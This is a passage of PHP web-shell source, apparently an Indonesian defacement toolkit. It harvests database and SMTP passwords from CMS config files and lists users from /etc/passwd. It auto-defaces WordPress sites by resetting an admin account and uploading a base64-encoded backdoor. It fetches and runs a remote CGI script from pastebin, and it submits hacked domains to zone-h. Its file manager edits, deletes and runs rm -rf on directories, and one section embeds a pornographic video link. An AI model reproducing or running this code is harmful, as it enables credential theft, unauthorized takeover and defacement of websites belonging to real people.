  2386. if($getu == '' || !$_usercp) {
  2387. echo "<font color=red>Can't read /etc/passwd</font>";
  2388. } else {
  2389. preg_match_all("/(.*?):x:/", $getu, $u);
  2390. foreach($u[1] as $user_cp) {
  2391. if(is_dir("/home/$user_cp/public_html")) {
  2392. echo "$user_cp\n";
  2393. }
  2394. }
  2395. }
  2396. }
  2397. echo "</textarea><br>
  2398. PASS: <br>
  2399. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  2400. function cp_pass($dir) {
  2401. $pass = "";
  2402. $dira = scandir($dir);
  2403. foreach($dira as $dirb) {
  2404. if(!is_file("$dir/$dirb")) continue;
  2405. $ambil = file_get_contents("$dir/$dirb");
  2406. if(preg_match("/WordPress/", $ambil)) {
  2407. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  2408. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  2409. $pass .= ambilkata($ambil,"password = '","'")."\n";
  2410. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  2411. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  2412. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  2413. $pass .= ambilkata($ambil,'password = "','"')."\n";
  2414. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  2415. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  2416. } elseif(preg_match("/^[client]$/", $ambil)) {
  2417. preg_match("/password=(.*?)/", $ambil, $pass1);
  2418. if(preg_match('/"/', $pass1[1])) {
  2419. $pass1[1] = str_replace('"', "", $pass1[1]);
  2420. $pass .= $pass1[1]."\n";
  2421. } else {
  2422. $pass .= $pass1[1]."\n";
  2423. }
  2424. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  2425. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  2426. }
  2427. }
  2428. echo $pass;
  2429. }
  2430. $cp_pass = cp_pass($dir);
  2431. echo $cp_pass;
  2432. echo "</textarea><br>
  2433. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  2434. </form>
  2435. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  2436. }
  2437. } elseif($_GET['do'] == 'smtp') {
  2438. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2439. echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  2440. echo "</div>";
  2441. function scj($dir) {
  2442. $dira = scandir($dir);
  2443. foreach($dira as $dirb) {
  2444. if(!is_file("$dir/$dirb")) continue;
  2445. $ambil = file_get_contents("$dir/$dirb");
  2446. $ambil = str_replace("$", "", $ambil);
  2447. if(preg_match("/JConfig|joomla/", $ambil)) {
  2448. $smtp_host = ambilkata($ambil,"smtphost = '","'");
  2449. $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  2450. $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  2451. $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  2452. $smtp_port = ambilkata($ambil,"smtpport = '","'");
  2453. $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  2454. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>[+] SMTP Grabber[+]</div>";
  2455. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2456. echo "SMTP Host: <font color=cyan>$smtp_host</font><br>";
  2457. echo "SMTP port: <font color=cyan>$smtp_port</font><br>";
  2458. echo "SMTP user: <font color=cyan>$smtp_user</font><br>";
  2459. echo "SMTP pass: <font color=cyan>$smtp_pass</font><br>";
  2460. echo "SMTP auth: <font color=cyan>$smtp_auth</font><br>";
  2461. echo "SMTP secure: <font color=cyan>$smtp_secure</font><br><br>";
  2462. }
  2463. }
  2464. }
  2465. $smpt_hunter = scj($dir);
  2466. echo $smpt_hunter;
  2467. } elseif($_GET['do'] == 'aetw') {
  2468. if($_POST['hajar']) {
  2469. $title = htmlspecialchars($_POST['new_title']);
  2470. $pn_title = str_replace(" ", "-", $title);
  2471. if($_POST['cek_edit'] == "Y") {
  2472. $script = $_POST['edit_content'];
  2473. } else {
  2474. $script = $title;
  2475. }
  2476. $conf = $_POST['config_dir'];
  2477. $scan_conf = scandir($conf);
  2478. foreach($scan_conf as $file_conf) {
  2479. if(!is_file("$conf/$file_conf")) continue;
  2480. $config = file_get_contents("$conf/$file_conf");
  2481. if(preg_match("/WordPress/", $config)) {
  2482. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2483. $dbuser = ambilkata($config,"DB_USER', '","'");
  2484. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2485. $dbname = ambilkata($config,"DB_NAME', '","'");
  2486. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2487. $prefix = $dbprefix."posts";
  2488. $option = $dbprefix."options";
  2489. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2490. $db = mysql_select_db($dbname);
  2491. $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  2492. $result = mysql_fetch_array($q);
  2493. $id = $result[ID];
  2494. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2495. $result2 = mysql_fetch_array($q2);
  2496. $target = $result2[option_value];
  2497. $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  2498. $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  2499. echo "<div style='margin: 5px auto;'>";
  2500. if($target == '') {
  2501. echo "URL: <font color=red>error, domainnya mati ditelan bumi</font> -> ";
  2502. } else {
  2503. echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  2504. }
  2505. if(!$update OR !$conn OR !$db) {
  2506. echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  2507. } else {
  2508. echo "<font color=green>sukses di ganti.</font><br>";
  2509. }
  2510. echo "</div>";
  2511. mysql_close($conn);
  2512. }
  2513. }
  2514. } else {
  2515. echo "<center>
  2516. <h1>Auto Edit Title+Content WordPress</h1>
  2517. <form method='post'>
  2518. DIR Config: <br>
  2519. <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  2520. Set Title: <br>
  2521. <input type='text' name='new_title' value='Hacked by RESIS-07 | GopressXploits' placeholder='New Title'><br><br>
  2522. Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  2523. <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  2524. <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  2525. <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  2526. </form>
  2527. <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  2528. ";
  2529. }
  2530. } elseif($_GET['do'] == 'zoneh') {
  2531. if($_POST['submit']) {
  2532. $domain = explode("\r\n", $_POST['url']);
  2533. $nick = $_POST['nick'];
  2534. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  2535. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  2536. function zoneh($url,$nick) {
  2537. $ch = curl_init("http://www.zone-h.com/notify/single");
  2538. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2539. curl_setopt($ch, CURLOPT_POST, true);
  2540. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  2541. return curl_exec($ch);
  2542. curl_close($ch);
  2543. }
  2544. foreach($domain as $url) {
  2545. $zoneh = zoneh($url,$nick);
  2546. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  2547. echo "$url -> <font color=cyan>OK</font><br>";
  2548. } else {
  2549. echo "$url -> <font color=red>ERROR</font><br>";
  2550. }
  2551. }
  2552. } else {
  2553. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Zone-H [+]</div>";
  2554. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2555. echo "<center><form method='post'>
  2556. <u>Defacer</u>: <br>
  2557. <input type='text' name='nick' size='50' value='RESIS-07'><br>
  2558. <u>Domains</u>: <br>
  2559. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  2560. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  2561. </form>";
  2562. }
  2563. echo "</center>";
  2564. } elseif($_GET['do'] == 'cgi') {
  2565. $cgi_dir = mkdir('human_cgi', 0755);
  2566. $file_cgi = "human_cgi/cgi.izo";
  2567. $isi_htcgi = "AddHandler cgi-script .izo";
  2568. $htcgi = fopen(".htaccess", "w");
  2569. fwrite($htcgi, $isi_htcgi);
  2570. fclose($htcgi);
  2571. $cgi_script = getsource("http://pastebin.com/raw/Lj46KxFT");
  2572. $cgi = fopen($file_cgi, "w");
  2573. fwrite($cgi, $cgi_script);
  2574. fclose($cgi);
  2575. chmod($file_cgi, 0755);
  2576. echo "<iframe src='human_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  2577. }
  2578. elseif($_GET['do'] == 'videosex') {
  2579. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Streaming Video Sex [+]</div>";
  2580. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2581. echo "<video src='http://videobokep.co/v/93.mp4' controls></video>";
  2582. }
  2583. elseif($_GET['do'] == 'adminer') {
  2584. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  2585. function adminer($url, $isi) {
  2586. $fp = fopen($isi, "w");
  2587. $ch = curl_init();
  2588. curl_setopt($ch, CURLOPT_URL, $url);
  2589. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  2590. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  2591. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  2592. curl_setopt($ch, CURLOPT_FILE, $fp);
  2593. return curl_exec($ch);
  2594. curl_close($ch);
  2595. fclose($fp);
  2596. ob_flush();
  2597. flush();
  2598. }
  2599. if(file_exists('adminer.php')) {
  2600. echo "<center><font color=cyan><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2601. } else {
  2602. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  2603. echo "<center><font color=cyan><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  2604. } else {
  2605. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2606. echo "<center><font color=red>gagal buat file adminer</font></center>";
  2607. }
  2608. }
  2609. } elseif($_GET['do'] == 'adw') {
  2610. if($_POST['auto_deface_wp']) {
  2611. function anucurl($sites) {
  2612. $ch = curl_init($sites);
  2613. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2614. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2615. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2616. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2617. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2618. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2619. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2620. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2621. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2622. $data = curl_exec($ch);
  2623. curl_close($ch);
  2624. return $data;
  2625. }
  2626. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  2627. $post = array(
  2628. "log" => "$userr",
  2629. "pwd" => "$pass",
  2630. "rememberme" => "forever",
  2631. "wp-submit" => "$wp_submit",
  2632. "redirect_to" => "$web",
  2633. "testcookie" => "1",
  2634. );
  2635. $ch = curl_init($cek);
  2636. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2637. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2638. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2639. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2640. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2641. curl_setopt($ch, CURLOPT_POST, 1);
  2642. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  2643. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2644. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2645. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2646. $data = curl_exec($ch);
  2647. curl_close($ch);
  2648. return $data;
  2649. }
  2650. $scan = $_POST['link_config'];
  2651. $link_config = scandir($scan);
  2652. $script = htmlspecialchars($_POST['script']);
  2653. $user = "gandatamvan";
  2654. $pass = "gandatamvan";
  2655. $passx = md5($pass);
  2656. foreach($link_config as $dir_config) {
  2657. if(!is_file("$scan/$dir_config")) continue;
  2658. $config = file_get_contents("$scan/$dir_config");
  2659. if(preg_match("/WordPress/", $config)) {
  2660. $dbhost = ambilkata($config,"DB_HOST', '","'");
  2661. $dbuser = ambilkata($config,"DB_USER', '","'");
  2662. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  2663. $dbname = ambilkata($config,"DB_NAME', '","'");
  2664. $dbprefix = ambilkata($config,"table_prefix = '","'");
  2665. $prefix = $dbprefix."users";
  2666. $option = $dbprefix."options";
  2667. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  2668. $db = mysql_select_db($dbname);
  2669. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  2670. $result = mysql_fetch_array($q);
  2671. $id = $result[ID];
  2672. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  2673. $result2 = mysql_fetch_array($q2);
  2674. $target = $result2[option_value];
  2675. if($target == '') {
  2676. echo "[-] <font color=red>error, domainnya mati ditelan bumi</font><br>";
  2677. } else {
  2678. echo "[+] $target <br>";
  2679. }
  2680. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  2681. if(!$conn OR !$db OR !$update) {
  2682. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  2683. mysql_close($conn);
  2684. } else {
  2685. $site = "$target/wp-login.php";
  2686. $site2 = "$target/wp-admin/theme-install.php?upload";
  2687. $b1 = anucurl($site2);
  2688. $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  2689. $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  2690. $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  2691. $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  2692. $www = "m.php";
  2693. $fp5 = fopen($www,"w");
  2694. fputs($fp5,$upload3);
  2695. $post2 = array(
  2696. "_wpnonce" => "$anu2",
  2697. "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  2698. "themezip" => "@$www",
  2699. "install-theme-submit" => "Install Now",
  2700. );
  2701. $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  2702. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2703. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2704. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2705. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2706. curl_setopt($ch, CURLOPT_POST, 1);
  2707. curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  2708. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2709. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2710. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  2711. $data3 = curl_exec($ch);
  2712. curl_close($ch);
  2713. $y = date("Y");
  2714. $m = date("m");
  2715. $namafile = "id.php";
  2716. $fpi = fopen($namafile,"w");
  2717. fputs($fpi,$script);
  2718. $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  2719. curl_setopt($ch6, CURLOPT_POST, true);
  2720. curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  2721. curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  2722. curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  2723. curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  2724. curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  2725. $postResult = curl_exec($ch6);
  2726. curl_close($ch6);
  2727. $as = "$target/k.php";
  2728. $bs = anucurl($as);
  2729. if(preg_match("#$script#is", $bs)) {
  2730. echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  2731. echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  2732. } else {
  2733. echo "[-] <font color='red'>gagal mepes...</font><br>";
  2734. echo "[!!] coba aja manual: <br>";
  2735. echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  2736. echo "[+] username: <font color=Green>$user</font><br>";
  2737. echo "[+] password: <font color=Green>$pass</font><br><br>";
  2738. }
  2739. mysql_close($conn);
  2740. }
  2741. }
  2742. }
  2743. } else {
  2744. echo "<center><h1>WordPress Auto Deface</h1>
  2745. <form method='post'>
  2746. <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  2747. <input type='text' name='script' height='10' size='50' placeholder='Hacked by RESIS-07 | GopressXploits' required><br>
  2748. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  2749. </form>
  2750. <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  2751. </center>";
  2752. }
  2753. } elseif($_GET['do'] == 'phinfo')
  2754. {@ob_start();@eval("phpinfo();");$buff = @ob_get_contents();@ob_end_clean();$awal = strpos($buff,"<body>")+6;$akhir = strpos($buff,"</body>");echo "<div class='phpinfo'>".substr($buff,$awal,$akhir-$awal)."</div>";}
  2755. elseif($_GET['act'] == 'newfile') {
  2756. if($_POST['new_save_file']) {
  2757. $newfile = htmlspecialchars($_POST['newfile']);
  2758. $fopen = fopen($newfile, "a+");
  2759. if($fopen) {
  2760. $act = "<script>window.location='?act=edit&dir=".$dir."&file=".$_POST['newfile']."';</script>";
  2761. } else {
  2762. $act = "<font color=red>permission denied</font>";
  2763. }
  2764. }
  2765. echo $act;
  2766. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Create File [+]</div>";
  2767. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2768. echo "<form method='post'>
  2769. Filename: <input type='text' name='newfile' value='$dir/asu.php' style='width: 450px;' height='10'>
  2770. <input type='submit' name='new_save_file' value='Submit'>
  2771. </form>";
  2772. } elseif($_GET['act'] == 'newfolder') {
  2773. if($_POST['new_save_folder']) {
  2774. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  2775. if(!mkdir($new_folder)) {
  2776. $act = "<font color=red>permission denied</font>";
  2777. } else {
  2778. $act = "<script>window.location='?dir=".$dir."';</script>";
  2779. }
  2780. }
  2781. echo $act;
  2782. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Create Folder DIR [+]</div>";
  2783. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2784. echo "<form method='post'>
  2785. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  2786. <input type='submit' name='new_save_folder' value='Submit'>
  2787. </form>";
  2788. } elseif($_GET['act'] == 'rename_dir') {
  2789. if($_POST['dir_rename']) {
  2790. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  2791. if($dir_rename) {
  2792. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2793. } else {
  2794. $act = "<font color=red>permission denied</font>";
  2795. }
  2796. echo "".$act."<br>";
  2797. }
  2798. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Rename File / DIR [+]</div>";
  2799. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2800. echo "<form method='post'>
  2801. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  2802. <input type='submit' name='dir_rename' value='rename'>
  2803. </form>";
  2804. } elseif($_GET['act'] == 'delete_dir') {
  2805. if(is_dir($dir)) {
  2806. if(is_writable($dir)) {
  2807. @rmdir($dir);
  2808. @exe("rm -rf $dir");
  2809. @exe("rmdir /s /q $dir");
  2810. $act = "<script>window.location='?dir=".dirname($dir)."';</script>";
  2811. } else {
  2812. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  2813. }
  2814. }
  2815. echo $act;
  2816. } elseif($_GET['act'] == 'view') {
  2817. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] View File [+]</div>";
  2818. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2819. echo "Filename: <font color=cyan>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2820. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  2821. } elseif($_GET['act'] == 'edit') {
  2822. if($_POST['save']) {
  2823. $save = file_put_contents($_GET['file'], $_POST['src']);
  2824. if($save) {
  2825. $act = "<font color=cyan>Saved!</font>";
  2826. } else {
  2827. $act = "<font color=red>permission denied</font>";
  2828. }
  2829. echo "".$act."<br>";
  2830. }
  2831. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Edit File [+]</div>";
  2832. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2833. echo "Filename: <font color=cyan>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2834. echo "<form method='post'>
  2835. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  2836. <input type='submit' value='Save' name='save' style='width: 500px;'>
  2837. </form>";
  2838. } elseif($_GET['act'] == 'rename') {
  2839. if($_POST['do_rename']) {
  2840. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  2841. if($rename) {
  2842. $act = "<script>window.location='?dir=".$dir."';</script>";
  2843. } else {
  2844. $act = "<font color=red>permission denied</font>";
  2845. }
  2846. echo "".$act."<br>";
  2847. }
  2848. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>[+] Rename [+]</div>";
  2849. echo "<div class='human' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2850. echo "Filename: <font color=cyan>".basename($_GET['file'])."</font> [ <a href='?act=view&dir=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?act=edit&dir=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?act=rename&dir=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?act=download&dir=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?act=delete&dir=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  2851. echo "<form method='post'>
  2852. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  2853. <input type='submit' name='do_rename' value='rename'>
  2854. </form>";
  2855. } elseif($_GET['act'] == 'delete') {
  2856. $delete = unlink($_GET['file']);
  2857. if($delete) {
  2858. $act = "<script>window.location='?dir=".$dir."';</script>";
  2859. } else {
  2860. $act = "<font color=red>permission denied</font>";
  2861. }
  2862. echo $act;
  2863. } else {
  2864. if(is_dir($dir) === true) {
  2865. if(!is_readable($dir)) {
  2866. echo "<font color=red>can't open directory. ( not readable )</font>";
  2867. } else {
  2868. echo '<table width="100%" class="human" border="0" cellpadding="3" cellspacing="1" align="center">
  2869. <tr>
  2870. <th class="th_home"><center>Name</center></th>
  2871. <th class="th_home"><center>Type</center></th>
  2872. <th class="th_home"><center>Size</center></th>
  2873. <th class="th_home"><center>Last Modified</center></th>
  2874. <th class="th_home"><center>Owner/Group</center></th>
  2875. <th class="th_home"><center>Permission</center></th>
  2876. <th class="th_home"><center>Action</center></th>
  2877. </tr>';
  2878. $scandir = scandir($dir);
  2879. foreach($scandir as $dirx) {
  2880. $dtype = filetype("$dir/$dirx");
  2881. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  2882. if(function_exists('posix_getpwuid')) {
  2883. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  2884. $downer = $downer['name'];
  2885. } else {
  2886. //$downer = $uid;
  2887. $downer = fileowner("$dir/$dirx");
  2888. }
  2889. if(function_exists('posix_getgrgid')) {
  2890. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  2891. $dgrp = $dgrp['name'];
  2892. } else {
  2893. $dgrp = filegroup("$dir/$dirx");
  2894. }
  2895. if(!is_dir("$dir/$dirx")) continue;
  2896. if($dirx === '..') {
  2897. $href = "<a href='?dir=".dirname($dir)."'>$dirx</a>";
  2898. } elseif($dirx === '.') {
  2899. $href = "<a href='?dir=$dir'>$dirx</a>";
  2900. } else {
  2901. $href = "<a href='?dir=$dir/$dirx'>$dirx</a>";
  2902. }
  2903. if($dirx === '.' || $dirx === '..') {
  2904. $act_dir = "<a href='?act=newfile&dir=$dir'>newfile</a> | <a href='?act=newfolder&dir=$dir'>newfolder</a>";
  2905. } else {
  2906. $act_dir = "<a href='?act=rename_dir&dir=$dir/$dirx'>rename</a> | <a href='?act=delete_dir&dir=$dir/$dirx'>delete</a>";
  2907. }
  2908. echo "<tr>";
  2909. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  2910. echo "<td class='td_home'><center>$dtype</center></td>";
  2911. echo "<td class='td_home'><center>-</center></th></td>";
  2912. echo "<td class='td_home'><center>$dtime</center></td>";
  2913. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  2914. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  2915. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  2916. echo "</tr>";
  2917. }
  2918. }
  2919. } else {
  2920. echo "<center>";
  2921. echo "<div class='tersakiti' border='0' cellpadding='3' cellspacing='1' align='center'>";
  2922. echo "<font color=red>can't open directory.</font>";
  2923. }
  2924. foreach($scandir as $file) {
  2925. $ftype = filetype("$dir/$file");
  2926. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  2927. $size = filesize("$dir/$file")/1024;
  2928. $size = round($size,3);
  2929. if(function_exists('posix_getpwuid')) {
  2930. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  2931. $fowner = $fowner['name'];
  2932. } else {
  2933. //$downer = $uid;
  2934. $fowner = fileowner("$dir/$file");
  2935. }
  2936. if(function_exists('posix_getgrgid')) {
  2937. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  2938. $fgrp = $fgrp['name'];
  2939. } else {
  2940. $fgrp = filegroup("$dir/$file");
  2941. }
  2942. if($size > 1024) {
  2943. $size = round($size/1024,2). 'MB';
  2944. } else {
  2945. $size = $size. 'KB';
  2946. }
  2947. if(!is_file("$dir/$file")) continue;
  2948. echo "<tr>";
